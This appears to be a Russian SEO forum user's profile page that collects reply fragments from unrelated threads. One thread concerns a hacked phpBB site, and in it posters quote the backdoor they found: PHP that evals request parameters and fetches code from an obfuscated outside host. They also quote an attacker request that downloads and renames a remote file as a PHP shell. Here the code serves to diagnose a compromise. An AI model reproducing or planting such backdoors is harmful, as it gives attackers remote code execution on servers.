vga1

vga1
Рейтинг
251
Регистрация
18.02.2007
Игорь ( Родной Портал):
На выдаче, у кого-то из отписавшихся, сегодня что-то отразилось?

В бурже позиции все на месте. Хотя ссылок в WMT уменьшилось в 2 -3 раза.

Милованов Ю.С:
<?php
exec(<?php $GET['co'] ?>);
?>
Как-то так.

Yes! вот она

if(isset($_GET['pa'])){$pa="sum";if($_REQUEST["pa"]==$pa)eval ( stripslashes($_REQUEST["co"]));die;}


if(isset($_GET['pa'])){eval ( file_get_contents("htt"."p://expo"."kama."."ru/cfg/img/RT/b.d"));die;}
./attach_mod/includes/functions_selects.php
siv1987:
А у вы уверены что это уязвимость? Вы ее проверяли, на сайте появлялись посторонние файлы? В багтрекере смотрели по поводу патчей для этой линейки? Это может быть и бэкдор или шелл в скриптах, уж больно параметры не соответствующие

Да, ехплоит заливаются, активность хацкера по логам видна.

phpbb проапдейчен 2.0.21

Возможно бекдор и залит давно, но чекал последним айболитом.

Мне не понятно, как стало возможно выполнять такие команды:

lang_main_attach.php?pa=sum&co=copy(%22http://expokama.ru/cfg/img/RT/base.txt%22,%22base.txt%22);rename(%22base.txt%22,%20%22base.php%22);

september:

Ну и идеи как себя обезопасить в дальнейшем от таких полечудес, что сделать еще, кроме замены контента, с большим удовольствием послушал бы.

Если страниц много, парсить будут явно не руками. Разрешите, например, 300 просмотров в день с одной связки IP + User Agent. Наиболее активных парсеров, например 300*7 = 2100 скачиваний за неделю - в бан на месяц.

Поисковых ботов детектить не по User Agent, которые постоянно подменяют, а по обратной зоне.

Платежи отправляют

Jan 23, 2013

Коллеги, влезу в чужую тему.

Интересует бесплатный хостинг, на который можно повесить PHP или cgi perl скрипт, позволяющий скачивать файлы или через программы системы (curl, wget) или модуль perl LWP или другими способами?

Евгений Дмитриевич:
Отправил сообщение по выходу из филтра, типа уже все сняли. Не тут то было - сказали еще есть ссылки.

... и еще скажут. Как еще Гуглу привлечь бесплатных работников для ручного пополнения базы ГС.

Укажите тематику сайта и региональность?

Благодарю за исчерпывающий ответ, получилось!

ПреведSeo:
так они прикрыли пхпмуадмин, счас нет доступа к базе, только доступ к файлам в панели

Тык как вы можете исправить ошибку базы, не имея к ней доступа. Пишите, объясните ситуацию, пусть доступ дадут.

Вообще странно, сейчас посмотрел на своем аккаунте годадди, доступ к файлам и рядом панель доступа к phpmyAdmin. Зачем им прикрывать доступ к админке - не понятно. Он же на их серверах, не на ваших, то есть не угрожает работоспособности хостинга.

Всего: 1713